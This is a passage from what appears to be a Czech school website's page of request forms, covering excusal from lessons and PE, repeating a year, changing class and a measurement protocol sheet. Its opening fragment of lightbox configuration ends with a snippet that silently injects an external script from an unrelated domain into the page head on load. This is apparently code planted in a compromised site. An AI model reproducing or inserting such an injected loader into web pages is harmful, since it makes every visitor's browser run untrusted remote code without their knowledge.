, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

Žádosti a formuláře

Žádost o vystavení duplikátu

Žádost o mimořádné uvolnění z výuky

Žádost o uvolnění z tělesné výchovy

Žádost o opakování ročníku – nezletilí žáci

Žádost o opakování ročníku – zletilí žáci

Žádost o přestup do jiné třídy – nezletilí žáci

Žádost o přestup do jiné třídy – zletilí žáci

Přední list protokolu o měření (vyplňujte přímo v ms excelu).